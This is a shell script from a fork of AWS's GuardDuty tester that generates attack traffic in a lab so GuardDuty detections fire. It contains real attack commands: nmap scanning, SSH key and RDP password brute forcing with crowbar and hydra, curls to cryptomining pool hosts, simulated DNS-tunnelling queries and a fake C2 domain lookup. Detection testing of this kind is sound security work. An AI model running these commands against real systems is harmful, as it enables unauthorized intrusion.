forked from awslabs/amazon-guardduty-tester
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathguardduty_tester.sh
139 lines (135 loc) · 7.58 KB
/
guardduty_tester.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#!/bin/bash
# load IP addresses created by templates
source localIps.sh
# simulate external recon
#echo 'External port probe on a temporarily unprotected port'
# 1 - simulate internal recon and attempted lateral movement
echo
echo '***********************************************************************'
echo '* Test #1 - Internal port scanning *'
echo '* This siumulates internal reconaissance by an internal actor or an *'
echo '* external actor after an initial compromise. This is considered a *'
echo '* low priority finding for GuardDuty because its not a clear indicator*'
echo '* of malicious intent on its own. *'
echo '***********************************************************************'
echo
sudo nmap -sT $BASIC_LINUX_TARGET
echo
echo '-----------------------------------------------------------------------'
echo
# 2 - ssh brute force with list of keys found on web
echo '***********************************************************************'
echo '* Test #2 - SSH Brute Force with Compromised Keys *'
echo '* This siumulates an SSH brute force attack on an SSH port that we *'
echo '* can access from this instance. It uses (phony) compromised keys in *'
echo '* many subsequent attempts to see if one works. This is a common *'
echo '* techique where the bad actors will harvest keys from the web in *'
echo '* places like source code repositories where people accidentally leave*'
echo '* keys and credentials (This attempt will not actually succeed in *'
echo '* obtaining access to the target linux instance in this subnet) *'
echo '***********************************************************************'
echo
for j in `seq 1 10`;
do
sudo ./crowbar/crowbar.py -b sshkey -s $BASIC_LINUX_TARGET/32 -u ec2-user -k ./compromised_keys;
done
echo
echo '-----------------------------------------------------------------------'
echo
# 3 - rdp brute force with known user and list of passwords found on web
echo '***********************************************************************'
echo '* Test #3 - RDP Brute Force with Password List *'
echo '* This siumulates an RDP brute force attack on the internal RDP port *'
echo '* of the windows server that we installed in the environment. It uses*'
echo '* a list of common passwords that can be found on the web. This test *'
echo '* will trigger a detection, but will fail to get into the target *'
echo '* windows instance. *'
echo '***********************************************************************'
echo
echo 'Sending 250 password attempts at the windows server...'
hydra -t 4 -f -l administrator -P ./passwords/password_list.txt rdp://$BASIC_WINDOWS_TARGET
echo
echo '-----------------------------------------------------------------------'
echo
# 4 - CryptoCurrency Activity
echo '***********************************************************************'
echo '* Test #4 - CryptoCurrency Mining Activity *'
echo '* This siumulates interaction with a cryptocurrency mining pool which *'
echo '* can be an indication of an instance compromise. In this case, we are*'
echo '* only interacting with the URL of the pool, but not downloading *'
echo '* any files. This will trigger a threat intel based detection. *'
echo '***********************************************************************'
echo
echo "Calling bitcoin wallets to download mining toolkits"
curl -s http://com.minergate.pool/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null &
curl -s http://xdn-xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null &
echo
echo '-----------------------------------------------------------------------'
echo
# 5 - DNS Exfiltation
echo '***********************************************************************'
echo '* Test #5 - DNS Exfiltration *'
echo '* A common exfiltration technique is to tunnel data out over DNS *'
echo '* to a fake domain. Its an effective technique because most hosts *'
echo '* have outbound DNS ports open. This test wont exfiltrate any data, *'
echo '* but it will generate enough unusual DNS activity to trigger the *'
echo '* detection. *'
echo '***********************************************************************'
echo
echo "Calling large numbers of large domains to simulate tunneling via DNS"
dig -f ./domains/queries.txt > /dev/null &
echo
# 6 - Backdoor:EC2/C&CActivity.B!DNS
echo '***********************************************************************'
echo '* Test #6 - Fake domain to prove that GuardDuty is working *'
echo '* This is a permanent fake domain that customers can use to prove that*'
echo '* GuardDuty is working. Calling this domain will always generate the *'
echo '* Backdoor:EC2/C&CActivity.B!DNS finding type *'
echo '***********************************************************************'
echo
echo "Calling a well known fake domain that is used to generate a known finding"
dig GuardDutyC2ActivityB.com any
echo
echo '*****************************************************************************************************'
echo 'Expected GuardDuty Findings'
echo
echo 'Test 1: Internal Port Scanning'
echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is performing outbound port scans against remote host.' $BASIC_LINUX_TARGET
echo 'Finding Type: Recon:EC2/Portscan'
echo
echo 'Test 2: SSH Brute Force with Compromised Keys'
echo 'Expecting two findings - one for the outbound and one for the inbound detection'
echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing SSH brute force attacks against ' $BASIC_LINUX_TARGET
echo 'Inbound: ' $RED_TEAM_IP ' is performing SSH brute force attacks against ' $BASIC_LINUX_INSTANCE
echo 'Finding Type: UnauthorizedAccess:EC2/SSHBruteForce'
echo
echo 'Test 3: RDP Brute Force with Password List'
echo 'Expecting two findings - one for the outbound and one for the inbound detection'
echo 'Outbound: ' $RED_TEAM_INSTANCE ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_TARGET
echo 'Inbound: ' $RED_TEAM_IP ' is performing RDP brute force attacks against ' $BASIC_WINDOWS_INSTANCE
echo 'Finding Type : UnauthorizedAccess:EC2/RDPBruteForce'
echo
echo 'Test 4: Cryptocurrency Activity'
echo 'Expected Finding: EC2 Instance ' $RED_TEAM_INSTANCE ' is querying a domain name that is associated with bitcoin activity'
echo 'Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS'
echo
echo 'Test 5: DNS Exfiltration'
echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is attempting to query domain names that resemble exfiltrated data'
echo 'Finding Type : Backdoor:EC2/DNSDataExfiltration'
echo
echo 'Test 6: C&C Activity'
echo 'Expected Finding: EC2 instance ' $RED_TEAM_INSTANCE ' is querying a domain name associated with a known Command & Control server. '
echo 'Finding Type : Backdoor:EC2/C&CActivity.B!DNS'
echo